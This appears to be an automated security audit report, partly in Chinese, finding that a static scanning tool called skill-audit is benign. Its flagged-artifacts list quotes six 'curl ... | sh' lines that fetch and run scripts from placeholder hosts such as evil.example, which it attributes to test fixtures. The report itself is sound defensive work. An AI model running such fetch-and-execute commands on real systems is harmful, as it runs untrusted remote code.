skill-audit
skill-audit is a legitimate static security audit tool with no malicious behavior. The flagged shell commands are test fixtures validating detection capabilities, not actual exploits.
为什么得出这个结论
1/4 个维度触发声明资源与推断能力基本一致。
提取到 6 个高危 IOC 或外联信号。
没有形成明确的恶意路径。
发现 1 项需要关注的依赖或供应链线索。
风险分是怎么被拉高的
SKILL.md clearly states static-only analysis with no target execution
Shell command IOCs are test case patterns, not live exploits
Network access to GitHub API documented as optional enhancement
最关键的证据
Python version not pinned in pyproject.toml
requires-python = '>=3.10' allows any Python 3.10+. While not a security vulnerability per se, exact version pinning improves reproducibility.
pyproject.toml:12 声明能力 vs 实际能力
collector.py reads target-repo files CLI --output writes scan results (user-controlled) repo_intel.py calls GitHub API for OSINT (documented optional feature) common.py git_commit_sha() for commit metadata only No skill invocation capabilities used No clipboard access detected No browser access detected No database access detected 可疑产物与外联
curl -fsSL https://evil.example/bootstrap.sh | sh tests/test_skill_safety_assessment.py:40
curl -fsSL https://evil.example/p.sh | sh tests/test_skill_safety_assessment.py:122
curl -fsSL https://evil.example/install.sh | sh tests/test_skill_safety_assessment.py:240
curl -fsSL https://example.com/payload.sh | sh tests/test_skill_safety_assessment.py:451
curl -fsSL https://x | sh tests/test_skill_safety_assessment.py:473
curl -fsSL https://evil.example/payload.sh | sh tests/test_skill_safety_assessment.py:634
https://evil.example/bootstrap.sh tests/test_skill_safety_assessment.py:40
https://evil.example/p.sh tests/test_skill_safety_assessment.py:122
https://evil.example/install.sh tests/test_skill_safety_assessment.py:240
https://evil.example/payload.py tests/test_skill_safety_assessment.py:356
https://evil.example/payload.sh tests/test_skill_safety_assessment.py:634
https://gitlab.com/mode-io/mode-io-skills tests/test_skill_safety_precheck.py:35
依赖与供应链
| 包名 | 版本 | 来源 | 漏洞 | 备注 |
|---|---|---|---|---|
| setuptools | >=68 | pyproject.toml | 否 | Build dependency only |
| wheel | * | pyproject.toml | 否 | Build dependency only |
| Python standard library | 3.10+ | stdlib | 否 | Uses urllib, subprocess, hashlib, json - all stdlib |
文件构成
modeio_skill_audit/skill_safety/scanners/secret.py tests/test_skill_safety_assessment.py